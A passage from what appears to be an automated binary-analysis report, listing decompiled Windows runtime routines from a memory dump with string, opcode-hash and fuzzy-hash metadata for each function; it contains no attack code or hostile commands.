                                                						if(_t105 == 0xffffffff) {
                                                							_t106 = 0;
                                                							__eflags = 0;
                                                						} else {
                                                							_t106 =  *(_t105 + 0x14);
                                                						}
                                                						__eflags = _t67 - 2;
                                                						if(_t67 > 2) {
                                                							__eflags = _t109 - 0xb85350;
                                                							if(_t109 != 0xb85350) {
                                                								__eflags = _t106 - _v20;
                                                								if(__eflags == 0) {
                                                									_t93 = _t109;
                                                									L00B2FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                                								}
                                                							}
                                                						}
                                                						_push("RTL: Re-Waiting\n");
                                                						_push(0);
                                                						_push(0x65);
                                                						_v20 = _t106;
                                                						L00B25720();
                                                						_t104 = _v28;
                                                						_t116 = _t116 + 0xc;
                                                						continue;
                                                					}
                                                				}
                                                			}




































                                                0x00aefa76
                                                0x00aefa78
                                                0x00aefa8a
                                                0x00aefa7a
                                                0x00aefa83
                                                0x00aefa83
                                                0x00aefa8f
                                                0x00aefa91
                                                0x00aefa97
                                                0x00aefa9d
                                                0x00aefaa4
                                                0x00aefaaa
                                                0x00aefaaf
                                                0x00aefab1
                                                0x00aefac3
                                                0x00aefab3
                                                0x00aefabc
                                                0x00aefabc
                                                0x00aefac8
                                                0x00aefacb
                                                0x00aefadf
                                                0x00aefadf
                                                0x00aefacb
                                                0x00aefaa4
                                                0x00aefa91
                                                0x00a92e6f
                                                0x00a92e6f
                                                0x00a92e5f
                                                0x00aefa13
                                                0x00aefa15
                                                0x00aefa17
                                                0x00aefa1f
                                                0x00aefa21
                                                0x00aefa22
                                                0x00aefa25
                                                0x00aefa28
                                                0x00aefa2f
                                                0x00aefa2f
                                                0x00aefa2a
                                                0x00aefa2a
                                                0x00aefa2a
                                                0x00aefa31
                                                0x00aefa34
                                                0x00aefa36
                                                0x00aefa3c
                                                0x00aefa3e
                                                0x00aefa41
                                                0x00aefa43
                                                0x00aefa45
                                                0x00aefa45
                                                0x00aefa41
                                                0x00aefa3c
                                                0x00aefa4a
                                                0x00aefa4f
                                                0x00aefa51
                                                0x00aefa53
                                                0x00aefa56
                                                0x00aefa5b
                                                0x00aefa5e
                                                0x00000000
                                                0x00aefa5e
                                                0x00a92e23

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Re-Waiting
                                                • API String ID: 0-316354757
                                                • Opcode ID: ed7faba22a293953e9bb2e2290b08fc29467aaa1711f1e9fcb3926223bde5466
                                                • Instruction ID: 54cdc8d8e9fd9dd6cce02004ca7849d584ddc0904b12814d699ebba287364096
                                                • Opcode Fuzzy Hash: ed7faba22a293953e9bb2e2290b08fc29467aaa1711f1e9fcb3926223bde5466
                                                • Instruction Fuzzy Hash: F561FD31B00684AFDF21DB69C884B7EBBF5EB44354F2406BAE8159B2D2CB349D00C781
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E00A952A5(char __ecx) {
                                                				char _v20;
                                                				char _v28;
                                                				char _v29;
                                                				void* _v32;
                                                				void* _v36;
                                                				void* _v37;
                                                				void* _v38;
                                                				void* _v40;
                                                				void* _v46;
                                                				void* _v64;
                                                				void* __ebx;
                                                				intOrPtr* _t49;
                                                				signed int _t53;
                                                				short _t85;
                                                				signed int _t87;
                                                				signed int _t88;
                                                				signed int _t89;
                                                				intOrPtr _t101;
                                                				intOrPtr* _t102;
                                                				intOrPtr* _t104;
                                                				signed int _t106;
                                                				void* _t108;
                                                
                                                				_t93 = __ecx;
                                                				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                                                				_push(_t88);
                                                				_v29 = __ecx;
                                                				_t89 = _t88 | 0xffffffff;
                                                				while(1) {
                                                					E00AAEEF0(0xb879a0);
                                                					_t104 =  *0xb88210; // 0x632c28
                                                					if(_t104 == 0) {
                                                						break;
                                                					}
                                                					asm("lock inc dword [esi]");
                                                					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                                                					E00AAEB70(_t93, 0xb879a0);
                                                					if( *((char*)(_t108 + 0xf)) != 0) {
                                                						_t101 =  *0x7ffe02dc;
                                                						__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                                                							L9:
                                                							_push(0);
                                                							_push(0);
                                                							_push(0);
                                                							_push(0);
                                                							_push(0x90028);
                                                							_push(_t108 + 0x20);
                                                							_push(0);
                                                							_push(0);
                                                							_push(0);
                                                							_push( *((intOrPtr*)(_t104 + 4)));
                                                							_t53 = E00AD9890();
                                                							__eflags = _t53;
                                                							if(_t53 >= 0) {
                                                								__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                                                									E00AAEEF0(0xb879a0);
                                                									 *((intOrPtr*)(_t104 + 8)) = _t101;
                                                									E00AAEB70(0, 0xb879a0);
                                                								}
                                                								goto L3;
                                                							}
                                                							__eflags = _t53 - 0xc0000012;
                                                							if(__eflags == 0) {
                                                								L12:
                                                								_t13 = _t104 + 0xc; // 0x632c35
                                                								_t93 = _t13;
                                                								 *((char*)(_t108 + 0x12)) = 0;
                                                								__eflags = E00ACF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                                								if(__eflags >= 0) {
                                                									L15:
                                                									_t102 = _v28;
                                                									 *_t102 = 2;
                                                									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                									E00AAEEF0(0xb879a0);
                                                									__eflags =  *0xb88210 - _t104; // 0x632c28
                                                									if(__eflags == 0) {
                                                										__eflags =  *((char*)(_t108 + 0xe));
                                                										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                                                										 *0xb88210 = _t102;
                                                										_t32 = _t102 + 0xc; // 0x0
                                                										 *_t95 =  *_t32;
                                                										_t33 = _t102 + 0x10; // 0x0
                                                										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                                                										_t35 = _t102 + 4; // 0xffffffff
                                                										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                                                										if(__eflags != 0) {
                                                											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                                                											E00B14888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                                                										}
                                                										E00AAEB70(_t95, 0xb879a0);
                                                										asm("lock xadd [esi], eax");
                                                										if(__eflags == 0) {
                                                											_push( *((intOrPtr*)(_t104 + 4)));
                                                											E00AD95D0();
                                                											L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                										}
                                                										asm("lock xadd [esi], ebx");
                                                										__eflags = _t89 == 1;
                                                										if(_t89 == 1) {
                                                											_push( *((intOrPtr*)(_t104 + 4)));
                                                											E00AD95D0();
                                                											L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                										}
                                                										_t49 = _t102;
                                                										L4:
                                                										return _t49;
                                                									}
                                                									E00AAEB70(_t93, 0xb879a0);
                                                									asm("lock xadd [esi], eax");
                                                									if(__eflags == 0) {
                                                										_push( *((intOrPtr*)(_t104 + 4)));
                                                										E00AD95D0();
                                                										L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                									}
                                                									 *_t102 = 1;
                                                									asm("lock xadd [edi], eax");
                                                									if(__eflags == 0) {
                                                										_t28 = _t102 + 4; // 0xffffffff
                                                										_push( *_t28);
                                                										E00AD95D0();
                                                										L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                                                									}
                                                									continue;
                                                								}
                                                								_t93 =  &_v20;
                                                								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                                                								_t85 = 6;
                                                								_v20 = _t85;
                                                								_t87 = E00ACF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                                								__eflags = _t87;
                                                								if(_t87 < 0) {
                                                									goto L3;
                                                								}
                                                								 *((char*)(_t108 + 0xe)) = 1;
                                                								goto L15;
                                                							}
                                                							__eflags = _t53 - 0xc000026e;
                                                							if(__eflags != 0) {
                                                								goto L3;
                                                							}
                                                							goto L12;
                                                						}
                                                						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                                                						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                                                							goto L3;
                                                						} else {
                                                							goto L9;
                                                						}
                                                					}
                                                					L3:
                                                					_t49 = _t104;
                                                					goto L4;
                                                				}
                                                				_t49 = 0;
                                                				goto L4;
                                                 			}

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: (,c
                                                • API String ID: 0-613782790
                                                • Opcode ID: 69904f8abdfb1b1894cf5fab8d199d39f5d91ec06394b5503fb5aab2c872b154
                                                • Instruction ID: 9cb5bcc91fc8114c3fc63f1bf1d9b2e4846dcb78a77e95e9d07f47fef992410f
                                                • Opcode Fuzzy Hash: 69904f8abdfb1b1894cf5fab8d199d39f5d91ec06394b5503fb5aab2c872b154
                                                • Instruction Fuzzy Hash: F051DF31209741AFC722EF68C942B6BBBE8FF50710F10091EF495876A2EB70E844C792
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 80%
                                                			E00B60EA5(void* __ecx, void* __edx) {
                                                				signed int _v20;
                                                				char _v24;
                                                				intOrPtr _v28;
                                                				unsigned int _v32;
                                                				signed int _v36;
                                                				intOrPtr _v40;
                                                				char _v44;
                                                				intOrPtr _v64;
                                                				void* __ebx;
                                                				void* __edi;
                                                				signed int _t58;
                                                				unsigned int _t60;
                                                				intOrPtr _t62;
                                                				char* _t67;
                                                				char* _t69;
                                                				void* _t80;
                                                				void* _t83;
                                                				intOrPtr _t93;
                                                				intOrPtr _t115;
                                                				char _t117;
                                                				void* _t120;
                                                
                                                				_t83 = __edx;
                                                				_t117 = 0;
                                                				_t120 = __ecx;
                                                				_v44 = 0;
                                                				if(L00B5FF69(__ecx,  &_v44,  &_v32) < 0) {
                                                					L24:
                                                					_t109 = _v44;
                                                					if(_v44 != 0) {
                                                						E00B61074(_t83, _t120, _t109, _t117, _t117);
                                                					}
                                                					L26:
                                                					return _t117;
                                                				}
                                                				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                                				_t5 = _t83 + 1; // 0x1
                                                				_v36 = _t5 << 0xc;
                                                				_v40 = _t93;
                                                				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                                				asm("sbb ebx, ebx");
                                                				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                                				if(_t58 != 0) {
                                                					_push(0);
                                                					_push(0x14);
                                                					_push( &_v24);
                                                					_push(3);
                                                					_push(_t93);
                                                					_push(0xffffffff);
                                                					_t80 = L00AD9730();
                                                					_t115 = _v64;
                                                					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                                						_push(_t93);
                                                						E00B5A80D(_t115, 1, _v20, _t117);
                                                						_t83 = 4;
                                                					}
                                                				}
                                                				if(E00B5A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                                					goto L24;
                                                				}
                                                				_t60 = _v32;
                                                				_t97 = (_t60 != 0x100000) + 1;
                                                				_t83 = (_v44 -  *0xb88b04 >> 0x14) + (_v44 -  *0xb88b04 >> 0x14);
                                                				_v28 = (_t60 != 0x100000) + 1;
                                                				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                                				_v40 = _t62;
                                                				if(_t83 >= _t62) {
                                                					L10:
                                                					asm("lock xadd [eax], ecx");
                                                					asm("lock xadd [eax], ecx");
                                                					if(E00AB7D50() == 0) {
                                                						_t67 = 0x7ffe0380;
                                                					} else {
                                                						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                					}
                                                					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                						E00B5138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                                					}
                                                					if(E00AB7D50() == 0) {
                                                						_t69 = 0x7ffe0388;
                                                					} else {
                                                						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                					}
                                                					if( *_t69 != 0) {
                                                						E00B4FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                                					}
                                                					if(( *0xb88724 & 0x00000008) != 0) {
                                                						E00B552F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                                					}
                                                					_t117 = _v44;
                                                					goto L26;
                                                				}
                                                				while(E00B615B5(0xb88ae4, _t83, _t97, _t97) >= 0) {
                                                					_t97 = _v28;
                                                					_t83 = _t83 + 2;
                                                					if(_t83 < _v40) {
                                                						continue;
                                                					}
                                                					goto L10;
                                                				}
                                                				goto L24;
                                                 			}

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: `
                                                • API String ID: 0-2679148245
                                                • Opcode ID: 41b81ba028ef315fddcd3f452a8c2acac664f6d0802e1786bd100b65f15b7296
                                                • Instruction ID: fd82ba6938445cecafc558bd23b4e46a92f80be7380f446ebcedef9d004ee019
                                                • Opcode Fuzzy Hash: 41b81ba028ef315fddcd3f452a8c2acac664f6d0802e1786bd100b65f15b7296
                                                • Instruction Fuzzy Hash: 2951DF712043429FD725DF29D981B2BB7E9EBC4304F0849ACF98697291D774EC45CB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E00ACF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                                				intOrPtr _v8;
                                                				intOrPtr _v12;
                                                				intOrPtr _v16;
                                                				char* _v20;
                                                				intOrPtr _v24;
                                                				char _v28;
                                                				intOrPtr _v32;
                                                				char _v36;
                                                				char _v44;
                                                				char _v52;
                                                				intOrPtr _v56;
                                                				char _v60;
                                                				intOrPtr _v72;
                                                				void* _t51;
                                                				void* _t58;
                                                				signed short _t82;
                                                				short _t84;
                                                				signed int _t91;
                                                				signed int _t100;
                                                				signed short* _t103;
                                                				void* _t108;
                                                				intOrPtr* _t109;
                                                
                                                				_t103 = __ecx;
                                                				_t82 = __edx;
                                                				_t51 = E00AB4120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                                				if(_t51 >= 0) {
                                                					_push(0x21);
                                                					_push(3);
                                                					_v56 =  *0x7ffe02dc;
                                                					_v20 =  &_v52;
                                                					_push( &_v44);
                                                					_v28 = 0x18;
                                                					_push( &_v28);
                                                					_push(0x100020);
                                                					_v24 = 0;
                                                					_push( &_v60);
                                                					_v16 = 0x40;
                                                					_v12 = 0;
                                                					_v8 = 0;
                                                					_t58 = E00AD9830();
                                                					_t87 =  *[fs:0x30];
                                                					_t108 = _t58;
                                                					L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                                					if(_t108 < 0) {
                                                						L11:
                                                						_t51 = _t108;
                                                					} else {
                                                						_push(4);
                                                						_push(8);
                                                						_push( &_v36);
                                                						_push( &_v44);
                                                						_push(_v60);
                                                						_t108 = E00AD9990();
                                                						if(_t108 < 0) {
                                                							L10:
                                                							_push(_v60);
                                                							E00AD95D0();
                                                							goto L11;
                                                						} else {
                                                							_t109 = L00AB4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                                							if(_t109 == 0) {
                                                								_t108 = 0xc0000017;
                                                								goto L10;
                                                							} else {
                                                								_t21 = _t109 + 0x18; // 0x18
                                                								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                                								 *_t109 = 1;
                                                								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                                								 *(_t109 + 0xe) = _t82;
                                                								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                                								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                                								E00ADF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                                								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                								 *((short*)(_t109 + 0xc)) =  *_t103;
                                                								_t91 =  *_t103 & 0x0000ffff;
                                                								_t100 = _t91 & 0xfffffffe;
                                                								_t84 = 0x5c;
                                                								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                                									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                                										_push(_v60);
                                                										E00AD95D0();
                                                										L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                                										_t51 = 0xc0000106;
                                                									} else {
                                                										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                                										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                                										goto L5;
                                                									}
                                                								} else {
                                                									L5:
                                                									 *_a4 = _t109;
                                                									_t51 = 0;
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				return _t51;
                                                 			}

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                • Instruction ID: d088eb3795562120c3d54dae9e4beaf090d35be107e2f3002b2ff38905216862
                                                • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                • Instruction Fuzzy Hash: 4E515871604710AFC321DF19C841E6BBBF9BF88710F108A2EF99687691E7B4E944CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E00B13540(intOrPtr _a4) {
                                                				signed int _v12;
                                                				intOrPtr _v88;
                                                				intOrPtr _v92;
                                                				char _v96;
                                                				char _v352;
                                                				char _v1072;
                                                				intOrPtr _v1140;
                                                				intOrPtr _v1148;
                                                				char _v1152;
                                                				char _v1156;
                                                				char _v1160;
                                                				char _v1164;
                                                				char _v1168;
                                                				char* _v1172;
                                                				short _v1174;
                                                				char _v1176;
                                                				char _v1180;
                                                				char _v1192;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				short _t41;
                                                				short _t42;
                                                				intOrPtr _t80;
                                                				intOrPtr _t81;
                                                				signed int _t82;
                                                				void* _t83;
                                                
                                                				_v12 =  *0xb8d360 ^ _t82;
                                                				_t41 = 0x14;
                                                				_v1176 = _t41;
                                                				_t42 = 0x16;
                                                				_v1174 = _t42;
                                                				_v1164 = 0x100;
                                                				_v1172 = L"BinaryHash";
                                                				_t81 = E00AD0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                                				if(_t81 < 0) {
                                                					L11:
                                                					_t75 = _t81;
                                                					L00B13706(0, _t81, _t79, _t80);
                                                					L12:
                                                					if(_a4 != 0xc000047f) {
                                                						E00ADFA60( &_v1152, 0, 0x50);
                                                						_v1152 = 0x60c201e;
                                                						_v1148 = 1;
                                                						_v1140 = E00B13540;
                                                						E00ADFA60( &_v1072, 0, 0x2cc);
                                                						_push( &_v1072);
                                                						E00AEDDD0( &_v1072, _t75, _t79, _t80, _t81);
                                                						E00B20C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                                						_push(_v1152);
                                                						_push(0xffffffff);
                                                						L00AD97C0();
                                                					}
                                                					return L00ADB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                                				}
                                                				_t79 =  &_v352;
                                                				_t81 = E00B13971(0, _a4,  &_v352,  &_v1156);
                                                				if(_t81 < 0) {
                                                					goto L11;
                                                				}
                                                				_t75 = _v1156;
                                                				_t79 =  &_v1160;
                                                				_t81 = E00B13884(_v1156,  &_v1160,  &_v1168);
                                                				if(_t81 >= 0) {
                                                					_t80 = _v1160;
                                                					E00ADFA60( &_v96, 0, 0x50);
                                                					_t83 = _t83 + 0xc;
                                                					_push( &_v1180);
                                                					_push(0x50);
                                                					_push( &_v96);
                                                					_push(2);
                                                					_push( &_v1176);
                                                					_push(_v1156);
                                                					_t81 = L00AD9650();
                                                					if(_t81 >= 0) {
                                                						if(_v92 != 3 || _v88 == 0) {
                                                							_t81 = 0xc000090b;
                                                						}
                                                						if(_t81 >= 0) {
                                                							_t75 = _a4;
                                                							_t79 =  &_v352;
                                                							L00B13787(_a4,  &_v352, _t80);
                                                						}
                                                					}
                                                					L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                                				}
                                                				_push(_v1156);
                                                				E00AD95D0();
                                                				if(_t81 >= 0) {
                                                					goto L12;
                                                				} else {
                                                					goto L11;
                                                				}
                                                			}
































                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: BinaryHash
                                                • API String ID: 0-2202222882
                                                • Opcode ID: 8fd8c2b03b73fa8458af19e3e66d1d9feabe5d30ae8992798e10984242e5eb12
                                                • Instruction ID: 2b293d70628d646d8f4d0239600cd3d5ac3d3c5c456bd849b8cecf5e4ea894e7
                                                • Opcode Fuzzy Hash: 8fd8c2b03b73fa8458af19e3e66d1d9feabe5d30ae8992798e10984242e5eb12
                                                • Instruction Fuzzy Hash: 7D4143F1D0452CAADF21DA50DD81FDEB7BCAB44B14F4045E5EA09AB241EB309F888F94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: `
                                                • API String ID: 0-2679148245
                                                • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                • Instruction ID: 7bf49f8c2bcae282472c6b07c45f8a5d8b51cff9e323bef65292928ffc971912
                                                • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                • Instruction Fuzzy Hash: 813122322003056BE720EE26CD85F9B77D9EBC4754F0482A9FA58AB2C0D774ED14CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: BinaryName
                                                • API String ID: 0-215506332
                                                • Opcode ID: 7c557efb3140dbf5451cc79dabdee2760df79692b36c2928d408d5e530df2e2b
                                                • Instruction ID: 2b48cc7bc7f75fa56d4301af775b02485f969c4de6ccde620c960ef9e4089905
                                                • Opcode Fuzzy Hash: 7c557efb3140dbf5451cc79dabdee2760df79692b36c2928d408d5e530df2e2b
                                                • Instruction Fuzzy Hash: B731F472900519AFDB15DB58C945DABB7F4EB80B60F1181A9B806A7241E770DF80C7A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: 8ce62aa8ffaf4e6c9bce52290252ecab10a7db51246a6379781c4498778c0294
                                                • Instruction ID: 3c3ffb75a255edceebfdc2a073481dedcf988ef2120f9d090965333fb96bf51a
                                                • Opcode Fuzzy Hash: 8ce62aa8ffaf4e6c9bce52290252ecab10a7db51246a6379781c4498778c0294
                                                • Instruction Fuzzy Hash: 4B3198B55083819FC311DF28C981EABBBE8EB89754F01092EB89597311EB34DD04DB93
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: WindowsExcludedProcs
                                                • API String ID: 0-3583428290
                                                • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                • Instruction ID: 751ab085b59a690e6c717451c0cd5bb272c5ccea68b4d45f5bf87398b9768a23
                                                • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                • Instruction Fuzzy Hash: 9121C577541228BBCB219F99C940FAFB7BDAF56B60F154426F9059B240DB34DD0097A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                • Critical error detected %lx, xrefs: 00B48E21
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: Critical error detected %lx
                                                • API String ID: 0-802127002
                                                • Opcode ID: da3ae473951d429b2e534ea00dd89ad15f47be10c7a459b878a9dd08639be837
                                                • Instruction ID: abf6c0ea8aa024a64aba8df927202cb2358a207ec5031c01e7e95d103f4ca0cc
                                                • Opcode Fuzzy Hash: da3ae473951d429b2e534ea00dd89ad15f47be10c7a459b878a9dd08639be837
                                                • Instruction Fuzzy Hash: 42115B71D54348EADF24DFA585067ACBBF0FB04714F24429EE429AB292C7744A01DF14
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9da4f0b7c17a8279333ceadef92737ab48c8afd088a1fe3e3a5f98cbced8bee0
                                                • Instruction ID: 13232c11880ca82ee16dc661757b0568d61ad5af0c31add03bb6f826a9f0d4e1
                                                • Opcode Fuzzy Hash: 9da4f0b7c17a8279333ceadef92737ab48c8afd088a1fe3e3a5f98cbced8bee0
                                                • Instruction Fuzzy Hash: 124247759006298FDB24CF68C881BA9B7F1FF49304F1481EAD94DAB342E7399A85CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f2b3f8e2efd24a0ee4ab0f922266c7c358dbdf025e815d42179cc72608f94cb4
                                                • Instruction ID: 5d284dce7cfa0702558d9403be1c4d1e6c8bae0d6a4fab5ffa7ecbaa91353566
                                                • Opcode Fuzzy Hash: f2b3f8e2efd24a0ee4ab0f922266c7c358dbdf025e815d42179cc72608f94cb4
                                                • Instruction Fuzzy Hash: 85F15B706082518FC724CF59C480ABAB7F5BF98714F144A2EF586CB2A2E734DC95DB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d80b905fc9de15ff771a9133ae1b811e1e99482ef4e5c3c52695f90a01cca970
                                                • Instruction ID: dd13af200cadc210a14bfdd496d4386e426391c770bcd84d91f7cfa3015621cc
                                                • Opcode Fuzzy Hash: d80b905fc9de15ff771a9133ae1b811e1e99482ef4e5c3c52695f90a01cca970
                                                • Instruction Fuzzy Hash: 93F10031A087419FDB35CB28C840B6B7BE5EF95324F1A866DE8999B390D734DC40CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4f1240401d3126829e02b12fbe80cb0d93e3bcb6e20d12468b22030cb7ed17a5
                                                • Instruction ID: 5049abbb0641ea88613cd92f07a46a781e516f66e8d8ef4cc64ca97063a7a8f9
                                                • Opcode Fuzzy Hash: 4f1240401d3126829e02b12fbe80cb0d93e3bcb6e20d12468b22030cb7ed17a5
                                                • Instruction Fuzzy Hash: FBB15D70E04249DFDB14DFD9C984AAEBBB9FF49304F20412AE505AB396DB74AD41CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5185f61507fe4baf0e8b443139626b7797727fe59bbe1748e07a9dd809f9088e
